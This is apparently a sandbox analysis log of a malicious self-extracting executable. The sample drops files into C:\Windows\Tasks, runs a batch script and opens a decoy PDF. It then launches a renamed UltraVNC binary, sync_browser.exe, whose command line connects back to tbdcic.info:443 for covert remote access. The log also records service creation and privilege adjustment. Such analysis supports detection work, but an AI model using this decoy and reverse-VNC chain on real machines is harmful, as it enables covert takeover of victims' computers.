Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5943550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	26_2_00007FF7D5943550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59418A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	26_2_00007FF7D59418A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59434B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	26_2_00007FF7D59434B0

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,

0_2_004011D1

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		21_2_00007FF7D5942D00
Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		26_2_00007FF7D5942D00

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5999BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,

21_2_00007FF7D5999BC0

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_0040385E

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401DC9

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Downloads\Lom.pdf

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
Source: C:\Windows\Tasks\sync_browser.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: Olz7TmvkEW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\timeout.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice
Source: sync_browser.exe	String found in binary or memory: -stopservice
Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice
Source: sync_browser.exe	String found in binary or memory: -stopservice

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

File read: C:\Users\user\Desktop\Olz7TmvkEW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Olz7TmvkEW.exe "C:\Users\user\Desktop\Olz7TmvkEW.exe"
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: apphelp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winsta.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\Windows\Tasks\UltraVNC.ini

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

File opened: C:\Windows\SYSTEM32\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Olz7TmvkEW.exe

Static file information: File size 1641047 > 1048576

Source:	Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
Source:	Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr

Source: sdABZ4.E1924R.0.dr

Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: Olz7TmvkEW.exe

Static PE information: real checksum: 0x2af97 should be: 0x198e1b

Source: sdABZ4.E1924R.0.dr	Static PE information: section name: .didat
Source: sdABZ4.E1924R.3.dr	Static PE information: section name: .didat
Source: conhost.exe.7.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00413660 push eax; ret	0_2_0041368E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593FEF1 push rcx; ret	21_2_00007FF7D593FEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59507F8 push rbp; iretd	21_2_00007FF7D59507F9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59512EF push rbp; iretd	21_2_00007FF7D59512F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5968CF9 push 8B481074h; iretd	21_2_00007FF7D5968CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594DC21 push rsp; ret	21_2_00007FF7D594DC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5951400 push rbp; iretd	21_2_00007FF7D5951401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594DC01 push rcx; ret	21_2_00007FF7D594DC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D594DC11 push rax; ret	21_2_00007FF7D594DC13
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593FEF1 push rcx; ret	26_2_00007FF7D593FEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59507F8 push rbp; iretd	26_2_00007FF7D59507F9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59512EF push rbp; iretd	26_2_00007FF7D59512F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5968CF9 push 8B481074h; iretd	26_2_00007FF7D5968CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594DC21 push rsp; ret	26_2_00007FF7D594DC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5951400 push rbp; iretd	26_2_00007FF7D5951401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594DC01 push rcx; ret	26_2_00007FF7D594DC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D594DC11 push rax; ret	26_2_00007FF7D594DC13

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows\Tasks\sync_browser.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\GIjul8.QTIrrr	Jump to dropped file
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sdABZ4.E1924R	Jump to dropped file
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\GIjul8.QTIrrr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sdABZ4.E1924R	Jump to dropped file
